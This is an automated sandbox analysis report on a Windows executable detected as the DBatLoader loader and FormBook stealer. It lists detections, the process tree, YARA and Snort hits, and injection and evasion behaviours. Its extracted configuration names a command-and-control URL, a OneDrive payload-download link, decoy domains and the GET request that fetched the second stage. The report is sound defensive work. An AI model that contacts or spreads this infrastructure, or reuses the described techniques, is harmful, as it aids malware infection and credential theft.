Windows Analysis Report
0321423605241625.exe

Overview

General Information

Sample Name:0321423605241625.exe
Analysis ID:756155
MD5:edb1382c354ec6c09c53473e5335703a
SHA1:a1a5fbfce034731cba1072bab6b97b26c8a90c79
SHA256:c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
Tags:exe, modiloader, xloader
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 0321423605241625.exe (PID: 3140 cmdline: C:\Users\user\Desktop\0321423605241625.exe MD5: EDB1382C354EC6C09C53473E5335703A)
    • colorcpl.exe (PID: 3576 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mwqrxeuz.exe (PID: 5528 cmdline: "C:\Users\Public\Libraries\Mwqrxeuz.exe" MD5: EDB1382C354EC6C09C53473E5335703A)
          • colorcpl.exe (PID: 4028 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
        • raserver.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 4028 cmdline: /c del "C:\Windows\SysWOW64\colorcpl.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\zuexrqwM.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=2
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\zuexrqwM.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
Source | Rule | Description | Author | Strings
00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      Source | Rule | Description | Author | Strings
      1.2.colorcpl.exe.10410000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.2.colorcpl.exe.10410000.3.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        1.2.colorcpl.exe.10410000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        1.2.colorcpl.exe.10410000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        1.0.colorcpl.exe.10410000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          No Sigma rule has matched
          Timestamp | SID | Source IP | Source Port | Destination IP | Destination Port | Protocol | Classtype
          11/29/22-18:26:33.912103 | 2031453 | 192.168.2.5 | 49719 | 217.160.0.95 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:08.582417 | 2031453 | 192.168.2.5 | 49715 | 192.0.78.141 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:33.912103 | 2031412 | 192.168.2.5 | 49719 | 217.160.0.95 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:23.800962 | 2031453 | 192.168.2.5 | 49717 | 52.85.92.84 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:33.912103 | 2031449 | 192.168.2.5 | 49719 | 217.160.0.95 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:08.582417 | 2031449 | 192.168.2.5 | 49715 | 192.0.78.141 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:23.800962 | 2031412 | 192.168.2.5 | 49717 | 52.85.92.84 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:08.582417 | 2031412 | 192.168.2.5 | 49715 | 192.0.78.141 | 80 | TCP | A Network Trojan was detected
          11/29/22-18:26:23.800962 | 2031449 | 192.168.2.5 | 49717 | 52.85.92.84 | 80 | TCP | A Network Trojan was detected

          AV Detection

          Source: 0321423605241625.exe | ReversingLabs: Detection: 35%
          Source: 0321423605241625.exe | Virustotal: Detection: 40%
          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 0321423605241625.exe | Avira: detected
          Source: www.rematedeldia.com/euv4/ | Avira URL Cloud: Label: malware
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | Avira: detection malicious, Label: HEUR/AGEN.1214697
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | ReversingLabs: Detection: 35%
          Source: 0321423605241625.exe | Joe Sandbox ML: detected
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe | Joe Sandbox ML: detected
          Source: 1.0.colorcpl.exe.10410000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.0321423605241625.exe.2170000.0.unpack | Avira: Label: TR/Hijacker.Gen
          Source: 1.0.colorcpl.exe.10410000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.525796c.4.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
          Source: 1.0.colorcpl.exe.10410000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.colorcpl.exe.10410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.a3cda0.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
          Source: 1.0.colorcpl.exe.10410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.0321423605241625.exe.2231218.1.unpack | Avira: Label: TR/Patched.Ren.Gen
          Source: 0321423605241625.exe | Malware Configuration Extractor: DBatLoader {"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo"}
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
          Source: 0321423605241625.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: Binary string: colorcpl.pdbGCTL source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02175B48

          Networking

          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          Source: Malware configuration extractor | URLs: www.rematedeldia.com/euv4/
          Source: Malware configuration extractor | URLs: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo
          Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox View | IP Address: 13.107.43.12
          Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
          Source: 0321423605241625.exe, 00000000.00000003.301183621.0000000000867000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307512986.0000000000868000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/
          Source: 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/U0
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/_
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/s
          Source: 0321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3
          Source: 0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd
          Source: unknown | DNS traffic detected: queries for: onedrive.live.com
          Source: C:\Users\user\Desktop\0321423605241625.exe | Code function: 0_2_02188CBC InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_02188CBC
          Source: global traffic | HTTP traffic detected:
            GET /y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 HTTP/1.1
            User-Agent: 92
            Host: ppqfqw.ph.files.1drv.com
            Connection: Keep-Alive
          Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: 0321423605241625.exe, 00000000.00000002.306915554.00000000007CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
